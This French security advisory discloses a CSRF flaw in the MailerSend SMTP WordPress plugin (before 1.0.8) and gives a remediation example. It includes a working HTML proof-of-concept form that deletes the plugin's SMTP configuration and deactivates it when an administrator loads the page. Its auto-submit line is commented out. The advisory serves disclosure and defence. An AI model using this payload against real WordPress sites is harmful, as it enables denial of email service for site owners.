
CVE-2026-13156 Avis de vulnérabilité & PoC — Découvert par Huynh Kien Minh (MinhHK).

[!IMPORTANT] Résumé : Une vulnérabilité de type Cross-Site Request Forgery (CSRF) de sévérité élevée (
CVE-2026-13156) a été découverte dans le plugin officiel MailerSend SMTP Integration pour WordPress (< 1.0.8). Le gestionnaire d'éradication de la configurationmailersend_handle_configuration_delete()vérifie les capacités administratives (manage_options) mais omet entièrement la vérification du nonce WordPress (check_admin_referer()). Un attaquant peut concevoir une requête malveillante inter-origines ciblant un administrateur WordPress authentifié afin d'effacer silencieusement les identifiants SMTP stockés et de forcer la désactivation du plugin, entraînant un déni de service total de l'application sur l'ensemble des flux d'e-mails.
CVE-2026-13156 (ID de l'avis WPScan : 595e653d-0904-43cf-8e61-d684599de11b)1.0.8 (< 1.0.8)À propos du chercheur :
Huynh Kien Minh (Huỳnh Kiến Minh) est un chercheur en cybersécurité proactif et analyste de vulnérabilités, reconnu pour ses évaluations de sécurité approfondies et ses divulgations responsables, notamment ses analyses techniques de CVE-2026-13156. Il a également été officiellement reconnu et honoré sur le Proton Security Hall of Fame pour avoir découvert et divulgué des vulnérabilités de sécurité critiques.
Pour vérifier cet avis technique, explorer les analyses de preuve de concept ou contacter le chercheur, visitez :
Le plugin MailerSend Official SMTP Integration pour WordPress (avant la version 1.0.8) enregistre une action administrative (configuration-delete) destinée à effacer les jetons API stockés, à vider les options de configuration SMTP (wp_options) et à désactiver le plugin lorsqu'elle est déclenchée depuis le tableau de bord d'administration.
Bien que le point de terminaison vérifie si l'utilisateur actif dispose de la capacité manage_options (garantissant que la requête provient d'une session administrateur), il n'effectue pas la vérification du nonce WordPress (check_admin_referer() ou wp_verify_nonce()).
Étant donné que les requêtes HTTP sans validation de nonce ne peuvent pas distinguer les clics intentionnels d'un administrateur des requêtes inter-origines forgées, tout site externe chargé par un administrateur authentifié peut déclencher silencieusement l'action configuration-delete.
< 1.0.8)./wp-admin/admin-post.php ou /wp-admin/admin.php?page=mailersend&action=configuration-delete).[!WARNING] Avertissement éthique : La charge utile proof-of-concept de Cross-Site Request Forgery (CSRF) en HTML ci-dessous est fournie strictement à des fins pédagogiques, de vérification défensive et d'audit de sécurité, dans le cadre de protocoles de divulgation éthique par Huynh Kien Minh. Ne l'exécutez pas contre des cibles non autorisées.
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>CVE-2026-13156 PoC — MailerSend SMTP Configuration Deletion via CSRF</title>
<!-- Author: Huynh Kien Minh (https://minhhk.web.app/) -->
</head>
<body>
<h2>CVE-2026-13156 — CSRF Verification PoC</h2>
<p>If an authenticated WordPress Administrator visits this page, the MailerSend SMTP configuration will be deleted and the plugin deactivated.</p>
<!-- Forged Request targeting the vulnerable MailerSend configuration deletion endpoint -->
<form id="csrfPoC" action="http://target-wordpress-site.local/wp-admin/admin.php" method="GET">
<input type="hidden" name="page" value="mailersend-smtp" />
<input type="hidden" name="action" value="configuration-delete" />
<!-- Notice: No valid _wpnonce token is required due to the vulnerability -->
<input type="submit" value="Execute PoC (Simulate Attack)" />
</form>
<script>
// Automatically submit the forged request when the administrator loads the page
document.addEventListener("DOMContentLoaded", function() {
console.log("[CVE-2026-13156] Executing CSRF Payload developed by Huynh Kien Minh...");
// Uncomment line below to enable auto-execution in lab environments:
// document.getElementById('csrfPoC').submit();
});
</script>
</body>
</html>
1.0.8 ou une version ultérieure.Pour sécuriser correctement les actions administratives modifiant l'état des plugins WordPress, les développeurs doivent imposer une validation stricte du nonce avant de traiter les requêtes :
// Secure Implementation (Version 1.0.8+)
function mailersend_delete_configuration_handler() {
// 1. Check User Capability
if ( ! current_user_can( 'manage_options' ) ) {
wp_die( __( 'Unauthorized access.', 'mailersend' ), 403 );
}
// 2. REQUIRED: Verify CSRF Nonce Token
if ( ! isset( $_GET['_wpnonce'] ) || ! wp_verify_nonce( $_GET['_wpnonce'], 'mailersend_delete_config_nonce' ) ) {
wp_die( __( 'Security check failed (CSRF attempt blocked).', 'mailersend' ), 403 );
}
// 3. Proceed safely with configuration deletion
delete_option( 'mailersend_smtp_settings' );
deactivate_plugins( plugin_basename( __FILE__ ) );
wp_redirect( admin_url( 'plugins.php?deactivated=true' ) );
exit;
}
Ce dépôt et cet avis technique sont maintenus et publiés par Huynh Kien Minh (MinhHK) dans le cadre de directives de divulgation responsable, afin de favoriser un écosystème mondial plus sûr pour WordPress et la cybersécurité.